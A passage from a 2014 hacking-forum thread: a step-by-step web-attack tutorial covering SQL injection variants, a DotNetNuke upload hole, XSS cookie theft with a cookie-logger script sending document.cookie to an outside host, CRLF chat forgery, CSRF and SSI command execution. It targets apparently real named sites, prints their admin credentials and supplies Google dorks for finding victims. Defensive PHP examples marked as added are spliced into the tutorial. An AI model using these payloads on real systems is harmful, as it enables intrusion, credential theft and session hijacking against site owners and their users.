[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'PASSWD' to a column of data type int.

/sr/page/member.asp, line 38

So the next column is PASSWD.

5) Taking data from columns

Now we put the column name instead of column_name, and after from we put the name of the table.
Code
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,USERNAME,3+from+Admin--

We get the username OjuZwqAul.

It is the same for the password:
Code
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,PASSWD,3+from+Admin--

We get the password M7sWt2!2uq.

[VIII] Blind SQL Injection

1) Blind SQL Injection?

The difference between SQL Injection and Blind SQL Injection is that with Blind SQL Injection the page does not print any errors, table or column names, or column contents; that is why it is called blind. You only work with parts of the page disappearing: an image, text, etc. In Blind Injection we don't use -- or /* */.

2) Site vulnerability check

We have the link:
Code
http://www.site.com/index.php?id=1

We add and 1=2
Code
http://www.site.com/index.php?id=1+and+1=2

If any part of the page disappears, the site is vulnerable.

3) Finding database version

As we said already, with this method nothing is shown, so we ask whether the database version is 4. If part of the site disappears, the version is not 4; if everything on the page stays as it should, the version is 4. We use @@version.
Code
http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=4

If the page loads as it should the version is 4; if not, we try:
Code
http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=5
4) MYSQL user

First we check whether we are able to use select, because it is sometimes blocked.
Code
http://www.site.com/index.php?id=1+and+(select+1)=1

If the page loads normally we can use select; if not, we can't. Now we check whether we have access to the MYSQL user table.
Code
http://www.site.com/index.php?id=1+and+(SELECT+*+from+mysql.user+limit+0,1)=1

As with everything else, if the page loads normally we have access to mysql.user; if not, we don't. mysql.user is useful for getting password hashes or for using load_file() and OUTFILE.

5) Finding table name

To find table names all we can do is guess. First we find the table name, then the column names from that table.
We have the link and we try different table names. If the page loads normally, a table with that name exists. (ime_tabele is a placeholder for the table name you are guessing.)
Code
http://www.site.com/index.php?id=1+and+(select+1+from+ime_tabele+limit+0,1)=1

Our main objective is to get data from the admin table; we can also try:
Code
admin
administrator
member
login
members
adm
user
users
tbl_admin
6) Finding column name

Now that we found the table we wanted, it is time to find the column names. We do the same as for the table: if a name matches, the page loads normally, which means the column exists. We need login data, so common columns are:
Code
username
admin
admin_username
uname
user
nick
password
pwrod
admin_password
pw
pass

The link we use for columns is (ime_tabele and ime_kolone are placeholders for the table and column name):
Code
http://www.sajt.com/index.php?id=1+and+(select+substring(concat(1,ime_kolone),1,1)from+ime_tabele+limit+0,1)=1
7) Taking data from columns

In the whole Blind SQL process this is the most boring and longest part. Here we need an ASCII table.
Code
http://www.asciitable.com/

We only look at the DEC and CHR columns of the ASCII table. First we get the username, letter by letter. So we need to guess the DEC value of each letter, e.g. for A it is 65.
We have the link:
Code
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+column_name+limit+0,1)1,1))>from DEC number

If the page loads normally we have found a real letter of the username. To find the second letter change +limit+0,1 to +limit+1,1.
So now we are guessing the second letter... It is the same for the password... So after a long, long time we get the username and password. If there are more users and you want their passwords too, you will have to add a where clause.
So it should look like:
Code
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+column_name+where+column_name=something+limit+0,1)1,1))>from DEC letter

For the where on the second column_name we usually use id, but other columns work too. E.g. for id:
Code
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+column_name+where+id=1+limit+0,1)1,1))>from DEC letter
8) Taking data from columns using sqlmap

As you have noticed, you need a lot of time to get data from columns this way, so I would suggest using sqlmap.
Download:
Code
http://sqlmap.org/

Python download:
Code
http://www.python.org/download/

Now we have to find the directory where sqlmap is located.
Start > Run > cmd, then change to the sqlmap directory with cd.
The command to start sqlmap for getting data with Blind SQL Injection on Windows is:
Code
sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name)"

NOTE: on Unix put python before sqlmap.py
So it should look like:
Code
python sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name)"

If there are more users, as I said, use the id:
Code
sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name where id=1)"

After -u you put the link.
After -p you put the parameter which is vulnerable (in our case id).
-a makes sqlmap use a random user agent from txt/user-agents.txt
-v1 is the verbosity level
After --string we put something that lets sqlmap recognise that it found a letter (some part of the text that disappears when the condition is false).
-e is the command that we want to execute. In our case this one:

Code
SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name where userid=1
[IX] Postgre SQL Injection

1) Postgre SQL Injection?

Postgre SQL Injection is almost the same as SQL Injection. The difference is that the database is PostgreSQL, not MySQL. It is a bit more complicated than the usual SQL Injection; there are some other functions that we will use, as you will see.

2) Finding vulnerable sites

Finding vulnerable sites is the same as for the usual SQL Injection, which means that we can use Google dorks.
Here are some:
Code
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=

3) Site vulnerability check

You found a site that may be vulnerable. To check whether it is vulnerable we add ' at the end of the link.
Code
http://www.link.com/page.php?page=1'

So if on the page we get:
Code
Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or near

or some part of the page disappears, the site is vulnerable.

4) Finding number of columns

So we know that the site is vulnerable; now we need to find the number of columns. This time we do it with union.
Our link:
Code
http://www.link.com/page.php?page=1+union+select+all+null--+-

If the page loads normally, that means there are more columns.

Code
http://www.link.com/page.php?page=1+union+select+all+null,null,null,null from dual--

We keep adding nulls until we get an error. If we get an error with 7 nulls, it means that we have 6 columns, which means 6 nulls.

5) Finding vulnerable columns

Finding a vulnerable column is easy. A null is an empty value, so we replace one null at a time with something that should print (in this case current_database()); if nothing shows, that column is not usable. That is how we find the vulnerable column.
So:
Code
http://www.link.com/page.php?page=1+union+select+all+current_database(),null,null,null--+-

If nothing is listed, the column is not usable: we set it back to null and move on to the next one.

6) Finding database version

We do this with the version() function.
This link will show us the version:
Code
http://www.link.com/page.php?page=1+union+select+all+version(),null,null,null--+-

We get something like:
Code
PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit
7) Finding table name

Same as usual SQL Injection, only diff. is that instead of column number we have null.
So it should look like:
Code
http://www.link.com/page.php?page=1+union+select+all table_name,null,null,null+from+information_schema.tables--+-




We will get table names also the columns from tables.

8) Finding column name

It is also easy, and there is no big difference.
This is how it should look like:
Code
http://www.link.com/page.php?page=1+union+select+all column_name,null,null,null+from+information_schema.columns+where+table_name=user&#8203;s--+-




Sometimes this wont work so we need to convert = from ascii in decimal.
You can use this site:
Code
http://easycalculation.com/ascii-hex.php




So we have link:
Code
http://www.link.com/page.php?page=1+union+select+all+column_name,null,null,null+from+information_sch&#8203;ema.columns+where+table_name||CHR(61)||users--+-




9) Taking data from columns

Also almost same as usual SQL Injection:
Code
http://www.link.com/page.php?page=1+union+select+all+username||CHR(58)||password+from+users--+-




[X] Error based Postgre SQL Injection

1) Error based Postgre SQL Injection?

Error based Postgre SQL Injection is a type of web attack related to the PostgreSQL database. The difference is that you can get all tables, columns, values from columns etc. As the title says, the attack is based on errors, and all results will be shown in errors.

2) Finding vulnerable sites

Use Google dorks:
Code
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=

3) Site vulnerability check

Add ' at the end of the link:
Code
http://www.link.com/page.php?page=1'

So if we get:
Code
Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or near

the site is vulnerable.

4) Finding database version

Use the version() function. In this type of attack the query looks a bit more complicated than the usual SQL Injection, so don't get confused.
Code
http://www.link.com/page.php?page=1+and+1=cast(version()+as+int)--

If the function is loaded successfully you will get this on the page:
Code
Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: "PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit"

from which we get the database version:
Code
PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit

5) Finding table name

As I said at the start, we are not able to get all tables at the same time, so we are going to use limit and offset.

We will use offset to say which result from the database we want to list.
Our link:
Code
http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+information_schema.tables+limit+1+offset+0)+as+int)--

On the page we will get this error:
Code
Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: "pg_type"

From this we have the table pg_type.

To get the next table we are going to change the offset to 1:
Code
http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+information_schema.tables+limit+1+offset+1)+as+int)--

and we are going to get a table like pg_attribute.

6) Finding column name

The first thing you have to do is to convert the table name into decimal.
We will use:
Code
http://easycalculation.com/ascii-hex.php

Type the string admin and you will get the decimal code:
Code
97 100 109 105 110

We will change this code a bit, so it should look like this:
Code
CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)

Now we will put it in for the table name and get the columns.
Code
http://www.link.com/page.php?page=1+and+1=cast((select+column_name+from+information_schema.columns+where+table_name=CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)+limit+1+offset+0)+as+int)--

and we will get the column id. We keep changing the offset until the site sends us back to the home page, which means that there are no more columns in that table.

7) Taking data from columns

We found the columns username and password and now we want to get the data from the columns.
Code
http://www.link.com/page.php?page=1+and+1=cast((select+username+||CHR(58)||+password+from+admin+limit+1+offset+0)+as+int)--

and we will get this:
Code
admin:21232f297a57a5a743894a0e4a801fc3

CHR(58) represents a colon (:) and we use it to get two columns at the same time.
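Both of the Postgres techniques above (the union-based one in [IX] and the error-based one in [X]) depend on two things on the server side: the page parameter being glued into the SQL text, and pg_query() failures being printed to the visitor. As an added example, not code from the tutorial, this is a page.php that closes both holes; it assumes PHP 7.1+, a table "pages" with columns "id" and "body", and the placeholder DSN shown.

```php
<?php
// Added example, not from the tutorial: a hardened page.php for the
// endpoint attacked in sections IX and X. Assumptions: a table "pages"
// with integer column "id" and text column "body", and the DSN below.

// Database errors go to the server log only. With display_errors on, the
// "pg_query(): Query failed" warning is what the error-based technique reads.
ini_set('display_errors', '0');

// Accepts only a plain positive integer, so "1'", "1+union+select..." and
// "1+and+1=cast(...)" are refused before any SQL is built. Returns null
// for anything else.
function parsePageId($raw): ?int
{
    if (!is_string($raw) || !preg_match('/^[1-9][0-9]{0,9}$/', $raw)) {
        return null;
    }
    return (int) $raw;
}

// The SQL text is constant; $1 is sent to PostgreSQL as a bound value,
// never spliced into the statement, so no union or cast() can be appended.
function fetchPageBody($db, int $id): ?string
{
    $res = pg_query_params($db, 'SELECT body FROM pages WHERE id = $1', [$id]);
    if ($res === false) {
        error_log('pages query failed: ' . pg_last_error($db));
        return null;
    }
    $row = pg_fetch_assoc($res);
    return $row === false ? null : (string) $row['body'];
}

$id = parsePageId($_GET['page'] ?? '');
if ($id === null) {
    http_response_code(400);
    exit('bad page id');
}

// Placeholder DSN; replace with the site's own connection settings.
$db = pg_connect('host=localhost dbname=app user=app password=CHANGEME');
if ($db === false) {
    http_response_code(500);
    exit('service unavailable');
}

$body = fetchPageBody($db, $id);
if ($body === null) {
    http_response_code(404);
    exit('no such page');
}
echo htmlspecialchars($body, ENT_QUOTES, 'UTF-8');
```

With this in place the probes from steps 3 and 4 of both sections get a 400 from parsePageId() and never reach pg_query(), and a genuine database error produces a log line instead of the "invalid input syntax for integer" text the error-based method reads.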

NOTE: (Regarding the whole tutorial) from now on I'm not going to explain it in detail, because I think you should have figured it out by now. So I'm going to use pics and codes only.

[XI] SQL Injection on ASPX

1) Site vulnerability check

Vulnerable link:
Code
http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton

We will add order by 1--:
Code
http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton order by 1--

If you get a page error, go to:
Code
http://pothys.com/ImageDisplay.aspx?Id=1535

2) Finding column name

Go to:
Code
http://pothys.com/ImageDisplay.aspx?Id=1535 having 1=1

s13.postimage.org/6ivvov0iv/img2.jpg

3) Finding table name
Code
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 table_name from information_schema.tables))

s7.postimage.org/qdv7qr5uz/img3.jpg

We want the admin table, so we type next:
Code
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Tab_FinalOrder')))

s15.postimage.org/sp0nmn9hn/img4.jpg

The admin table name is AdminMaster.

4) Finding columns in admin table

Code
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name = 'AdminMaster'))

Code
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name = 'AdminMaster' and column_name not in ('Admin_name')))

Column names:

s14.postimage.org/pwr77oewh/img5.jpg

s17.postimage.org/5i2zlmuu7/img6.jpg

5) Finding username and password

Code
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 Admin_name from AdminMaster))

s15.postimage.org/hr7rnfeff/img7.jpg

Code
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 Admin_password from AdminMaster))

s11.postimage.org/kvxwwklyr/img8.jpg

Code
Username: admin
Password: pothys!@#

[XII] Dot net nuke

DNN is a gallery that you can upload to a site, and in there you can hold pictures and have something like an "online gallery". That gallery has a hole in itself, so you can use it to upload files to the site with the extensions *.gif, *.jpg, *.pdf, *.txt, *.swf...

Google dork to find vulnerable sites:
Code
inurl:fck/fcklinkgallery.aspx

I'm going to use this site:
Code
http://kellyballancephotography.com/providers/htmleditorproviders/fck/fcklinkgallery.aspx

Now if the page loads it will look like this:

s18.postimage.org/erglobawp/image.jpg

which means that we can continue. Now we choose option 3 -> File (A File On Your Site) and we type JavaScript to upload the file.

Code
javascript:__doPostBack('ctlURL$cmdUpload','')

Choose File and the Upload Selected File button will show up.

*On this site the text colour matches the background, so you will have to select the whole page (CTRL+A) and you will see the upload button.

s17.postimage.org/6meo81nrz/image.jpg

Upload the file and access it by going to sitelink.com/portals/0/filename.extension
->
Code
http://kellyballancephotography.com/portals/0/config.txt

[XIII] XSS

1) XSS?

XSS lets an attacker execute JavaScript code. XSS is short for Cross Site Scripting.
You can use XSS in many ways: for simply executing JavaScript commands, or you can use it to steal cookies. We are injecting cookies so we can log in somewhere without a password.

2) Required stuff

Mozilla Firefox:
Code
http://www.mozilla.org/en-US/products/download.html?product=firefox-3.0.5&os=win&lang=en-GB

Add-on Firebug:
Code
https://addons.mozilla.org/en-US/firefox/addon/firebug/

Add-on FireCookie:
Code
https://addons.mozilla.org/en-US/firefox/addon/firecookie/

Add-on Live HTTP Headers:
Code
https://addons.mozilla.org/en-US/firefox/downloads/file/28118/live_http_headers-0.14-fx+sm.xpi

It is recommended to have basic knowledge of JavaScript.

3) Testing XSS vulnerability

Sites on which we can use this method are sites where there is a text input and a submit button, and sites where you can use the GET method to print something.
e.g. of the GET method:
Code
www.site.com/index.php?page=<script>alert("XSS")</script>

The command to check site vulnerability is:
Code
<script>alert("XSS")</script>

Now I will explain what this command is doing:
<script> - opening script tag
alert("XSS") - a window will pop up saying "XSS"
</script> - closing script tag

4) XSS types

Cookie Stealing - we are stealing cookies from some user (commonly the admin), and put the cookie in our browser, so when we go to the site we are already logged in.
Cross-Site Request Forgery - we are sending some commands without knowing the username.
XSS Worms - an "evil" script that has the possibility to spread over the whole site.
Door-Forwarding - the script makes an iframe which will exploit something or start downloading some virus, RAT, keylogger, istealer, etc...
Keylogging - you know what keylogging is.

5) Cookie Stealing

For cookie stealing we will need:
-Vulnerable site
-Web host for scripts
-PHP script

Put this script on some hosting:

cookie.php
Code
<?php
// Appends the value of the "cookie" GET parameter to cookielog.txt
$cookie = isset($_GET['cookie']) ? $_GET['cookie'] : '';
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n");
fclose($file);
?>

Script execution:
Code
<script>document.location="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
or
<script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
or
<script>window.open('http://www.link.com/cookie.php?cookie=' + document.cookie);</script>
or
<script>window.location='http://www.link.com/cookie.php?cookie=' + document.cookie;</script>

How does this work?
When some user logs on to the page with your cookie logger, you save his cookie. Then we take the cookie and use it. So here is how we do it:

1) Open Mozilla
2) Open the Firebug add-on

s9.postimage.org/r42pchyjz/aa2.jpg

3) Type the cookie name and value. Here is one:
Code
PHPSESSID=db3e4e100ab6bb912de1b80c4eed7898

From this cookie the name is PHPSESSID
From this cookie the value is db3e4e100ab6bb912de1b80c4eed7898

6) Filter bypassing

1) Deleting the script tag
e.g. if we type <script>alert("XSS")</script> and it prints only the command alert("XSS"). This script deletes the tags <script> and </script>.
Here is also how to bypass the protection: instead of <script>alert("XSS")</script> we will add <scr<script>ipt>alert("XSS")</scr</script>ipt>

2) magic_quotes
Explained here:
Code
http://en.wikipedia.org/wiki/Magic_quotes

If you type <script>alert("XSS")</script> and it prints <script>alert(\"XSS\")</script> then it is magic_quotes protection.
It is a bit harder to bypass magic_quotes protection. It works with String.fromCharCode.
Here is an example:
This is the link of our cookie logger: http://link.com/cookie.php. We would turn <script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script> into:
Code
<scr<script>ipt>location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,108,105,110,107,46,99,111,109,47,99,111,111,107,105,101,46,112,104,112,63,99,111,111,107,105,101,61)+document.cookie;</scr</script>ipt>

This works because the protection adds \ to ' or ", and when you use integers you do not use ' or " at all.

And here, http://www.link.com/cookie.php?cookie= is what we converted to decimal code with this tool:
Code
http://pookey.co.uk/binary.php (Ascii to Decimal)

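Two things decide whether the cookie-stealing and filter-bypass steps in this section work against a site: whether the session cookie is readable from document.cookie, and whether the page filters by deleting tags (which section 6 shows is bypassable) or by encoding output. As an added example, not code from the tutorial, this PHP shows the weak filter next to the encoding fix and sets the session cookie HttpOnly; it assumes PHP 7.3+ and a site served over HTTPS.

```php
<?php
// Added example, not from the tutorial. Shows why the "delete the script
// tag" filter from section 6 fails, what output encoding does instead, and
// how an HttpOnly session cookie keeps PHPSESSID out of document.cookie.
// Assumes PHP 7.3+ (array form of session_set_cookie_params) and HTTPS.

// The weak filter: deletes <script> and </script>. Removing the inner tags
// from <scr<script>ipt>...</scr</script>ipt> leaves a working script tag.
function stripScriptTags(string $s): string
{
    return str_ireplace(['<script>', '</script>'], '', $s);
}

// The fix: encode for the HTML context the value lands in, so no input can
// open or close a tag or attribute. The browser shows it as plain text.
function encodeForHtml(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$probe = '<scr<script>ipt>alert("XSS")</scr</script>ipt>';
$weak  = stripScriptTags($probe); // <script>alert("XSS")</script>  (bypassed)
$safe  = encodeForHtml($probe);   // &lt;scr&lt;script&gt;ipt&gt;...  (inert)

// HttpOnly must be set before session_start(); afterwards the cookie
// loggers in section 5 get a document.cookie without PHPSESSID in it.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);
session_start();

// The GET parameter from section 3 (index.php?page=<script>...) rendered
// through the encoder: the probe is displayed, not executed.
echo '<p>Page: ' . encodeForHtml((string) ($_GET['page'] ?? '')) . '</p>';
```

The String.fromCharCode trick in section 6 does not help against encodeForHtml() either, because the bypass only avoids quotes; it still needs a live <script> tag, and the encoder turns every < and > into text.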
[XIV] CRLF

1) CRLF?

Short for Carriage Return and Line Feed. CRLF is very easy to use. It is actually like we are adding a new row (\n).

2) Vulnerable places

Vulnerable places are anywhere. In this tutorial I'm going to use a chat.

3) Exploiting vulnerability and protection

Let's say if you send a message the chat will look like this:
Code
1.4.2012 10:29 - fodex: Why login page is down?
1.4.2012 10:29 - saiR: Look like somebody deleted login database.
1.4.2012 10:29 - Admin: I'm gonna check this out and will announce you.
1.4.2012 10:30 - saiR: Ok go ahead...\n1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in here till I get it back: http://vulnerablesite.com/login.php

If the chat is vulnerable, it's going to look like this:
Code
1.4.2012 10:30 - saiR: Ok go ahead...
1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in here till I get it back: http://vulnerablesite.com/login.php

We wrote the second message from Admin, and users will think that Admin actually sent it and will log in to the site we gave them. With that login we are going to keylog the site logins.


4) Vulnerable script

e.g.
Code
<?php
if(isset($_POST['send_message']))
{
   if(!empty($_POST['message']))
   {
      // htmlspecialchars() encodes < > & " ' but leaves \r and \n untouched,
      // so a message containing a line break is stored as two chat lines
      $message = htmlspecialchars($_POST['message']);
      // rest of the code to send the message
   }
}
?>
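The script above is vulnerable because htmlspecialchars() only handles HTML metacharacters, not line breaks. As an added example, not code from the tutorial, this is the same handler with the message refused when it carries any control character (CR/LF included), and the timestamp and nickname supplied by the server rather than the sender; the nickname "saiR" is a constructed stand-in for whatever the session holds.

```php
<?php
// Added example, not from the tutorial: hardened version of the chat
// handler in section XIV/4. The original only calls htmlspecialchars(),
// which leaves \r and \n alone, so one POST can carry a forged second line.

// Normalises one chat message. Rejects rather than strips control
// characters: a message containing a line break is either a mistake or an
// injection attempt, and either way must not be stored as two lines.
// Returns the HTML-encoded message, or null when it must be refused.
function sanitizeChatMessage(string $raw, int $maxLen = 500): ?string
{
    // \x00-\x1F covers CR (\x0D), LF (\x0A), NUL and the other C0 controls;
    // \x7F is DEL.
    if (preg_match('/[\x00-\x1F\x7F]/', $raw)) {
        return null;
    }
    $msg = trim($raw);
    if ($msg === '' || strlen($msg) > $maxLen) {
        return null;
    }
    return htmlspecialchars($msg, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Builds the stored line in the same shape as the chat in section 3.
// Timestamp and nickname come from the server, never from the client, so
// a sender cannot impersonate "Admin" even if a line break got through.
function formatChatLine(string $nick, string $msg, int $ts): string
{
    return date('j.n.Y H:i', $ts) . ' - '
         . htmlspecialchars($nick, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
         . ': ' . $msg;
}

if (isset($_POST['send_message'])) {
    $clean = sanitizeChatMessage((string) ($_POST['message'] ?? ''));
    if ($clean === null) {
        http_response_code(400);
        exit('message rejected');
    }
    // "saiR" stands in for the nickname read from the logged-in session.
    $line = formatChatLine('saiR', $clean, time());
    // rest of the code stores $line as a single chat entry
}
```

The forged message from section 3 ("Ok go ahead...\n1.4.2012 10:30 - Admin: ...") contains a real newline, so sanitizeChatMessage() returns null and nothing is stored.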




[XV] CSRF

1) CSRF?

Short for Cross Site Request Forgery. CSRF is a mix of XSS and LFI. It is used to execute something without knowing the username.

2) Vulnerable places

Can be used when the site is using the GET method. If CSRF is done successfully, the attacker can change the password of some user. The most common vulnerable places are avatars.

3) Exploiting vulnerability

Let's say we have a profile link:
Code
http://www.link.com/profile.php

where you can see user data (username, avatar, email...).
Now when the user wants to edit his profile he uses e.g.
Code
http://www.link.com/edit_profile.php

Now instead of the avatar link we are going to add the profile-editing link together with the new value, using the GET method.

NOTE: The site has to use the GET method for profile editing, otherwise we won't be able to attack.

Add as avatar link:
Code
http://www.link.com/edit_profile.php?password=newpassword

password is the name of the input (it can be different, it's best to check the source code).

Now when we look at the avatar we won't be able to see a picture (as if there is no picture). When another user views your avatar, if the attack was successful, his password is going to be changed to the one we put.
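The avatar trick works only because edit_profile.php changes the password on a plain GET and asks for nothing the victim's browser would not send automatically. As an added example, not code from the tutorial, this edit_profile.php accepts the change only over POST and only with a per-session token; it assumes PHP 7+, a logged-in user id in $_SESSION['user_id'], and leaves storing the hash to the site's own code.

```php
<?php
// Added example, not from the tutorial: edit_profile.php from section XV
// with the two checks that stop the avatar-link trick. Assumes PHP 7+, that
// the logged-in user id is in $_SESSION['user_id'], and that the project
// has its own way to store the new password hash.
session_start();

// One random token per session. A request fired by an <img> tag in someone
// else's avatar cannot read this value, so it cannot send it back.
function csrfToken(): string
{
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'];
}

// Constant-time comparison against the session's token.
function csrfTokenValid($supplied): bool
{
    return is_string($supplied) && isset($_SESSION['csrf'])
        && hash_equals($_SESSION['csrf'], $supplied);
}

// Check 1: GET only renders the form. The GET request that an avatar
// <img src="edit_profile.php?password=..."> produces changes nothing.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    $tok = htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8');
    echo '<form method="post">'
       . '<input type="hidden" name="csrf" value="' . $tok . '">'
       . '<input type="password" name="password">'
       . '<button>Change password</button></form>';
    exit;
}

// Check 2: the POST must carry the token tied to this session.
if (!csrfTokenValid($_POST['csrf'] ?? null)) {
    http_response_code(403);
    exit('invalid request');
}

$new = (string) ($_POST['password'] ?? '');
if (strlen($new) < 12) {
    http_response_code(400);
    exit('password too short');
}
$hash = password_hash($new, PASSWORD_DEFAULT);
// Store $hash for $_SESSION['user_id'] with the project's own storage code.
echo 'password changed';
```

With this in place the avatar URL from step 3 only fetches the form (no state change), and a forged POST from another origin fails check 2 because the attacker never sees the victim's token.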

[XVI] Server Side Includes | Server Side Inclusion

1) Introduction to Server Side Includes

Server Side Includes enable us to do some things faster on sites. Over SSI we can update the DB, send mails and many other functions. SSI works like when someone runs a script on that site. The default extension for SSI files is .shtml.
To get SSI working, in the directory where the .shtml file is located there must be a .htaccess file, which holds some configuration.
SSI is disabled by default; you can enable it by creating a new .htaccess file with this config:
Code
AddType text/html .shtml
AddHandler server-parsed .shtml
AddHandler server-parsed .html
Options Indexes FollowSymLinks Includes

2) SSI creating

We start a script with <!--#
A simple script looks like this:
<!--#<command> <variable>=<variable content>-->

Code
<command> -
config
include
flow
set
printenv
echo
exec
fsize
flastmod
time & date

With --> we end the script.

Script e.g.
Code
<!--#include file="yourfilename.txt" -->
<!--#echo var='This will write this stupid text.'-->

3) Server Side Inclusion

Server Side Inclusion Attack is a very useful attacking method. For this it's recommended to have basic knowledge of Bash and Batch programming.

A site is vulnerable to SSI when the extensions '.shtml', '.shtm' or '.stm' are included in the Apache config file.
e.g. we can create a file with the next command:
Code
<!--#exec cmd='ls -la'-->

Save this as an .shtml file and open it on the site.

I think you already know what is going to happen.
Hope this helped you!

Thanks for reading

Credits: EliteHackForums

Posted by buglu on 02/12/2014 10:13:55
#2

Hey Hax,

A very nice tutorial of different hacking methods!

Also a very nice written guide on the most methods.

But I want to point out that the nullbyte injection isn't really common anymore. It has been fixed since PHP 5.2.x or something. Teddy posted a link about it on my thread: local file inclusion.


But beside that, a very nice article ;)

Edited by buglu on 02/13/2014 03:22:18

Posted by Override on 02/12/2014 19:44:01
#3

A very well put together tutorial. Thank you for sharing.

Posted by hax366 on 02/13/2014 05:25:40
#4

buglu wrote:
Hey Hax,

A very nice tutorial of different hacking methods!

Also a very nice written guide on the most methods.

But I want to point out that the nullbyte injection isn't really common anymore. It has been fixed since PHP 5.2.x or something. Teddy posted a link about it on my thread: local file inclusion.


But beside that, a very nice article ;)


yeah fine, but nullbyte injection is still there for reference :)

:D thanks

Posted by hax366 on 02/13/2014 05:26:37
#5

Override wrote:
A very well put together tutorial. Thank you for sharing.


yeah it's my pleasure :) I am just a SO Lov3r <3

Posted by Slappy on 02/13/2014 21:02:22
#6

This is great mate. Thanks for your efforts,

Posted by r0am3r on 02/16/2014 05:08:27
#7

Great guide hax366!

Posted by unknownX on 03/14/2014 11:14:43
#8

Nice tutorial bro thanks :)B)

Posted by trojan_dz on 03/15/2014 05:22:56
#9

Awesome :D

Posted by neoxquick on 03/23/2014 16:56:29
#10

would it be possible to get this in pdf file??

Posted by im404 on 05/01/2014 14:11:25
#11

Mark! Thank you Very much! :P

Posted by neoxquick on 05/01/2014 19:50:29
#12

can you put this into pdf?


bye N

Posted by lagon on 05/11/2014 05:21:07
#13

That must be the most detailed tut I've ever seen!
thanks

Posted by PythonB on 05/11/2014 21:09:39
#14

Wonder how long it took you to do this, mate! THANKS

Posted by fishassassin on 06/30/2014 21:15:10
#15

Hey guys... Assuming it's okay with hax366, I'm in the process of converting his post into a PDF. It'll take some time, because formatting a file that large is really boring, but I should have it done in a day or two.

EDIT: I've formatted the post into a .PDF to the best of my abilities, and uploaded it into the Security Override File Database under the 'articles' section. It is titled "hax366 webhacking tut.pdf"

Edited by fishassassin on 07/02/2014 23:54:36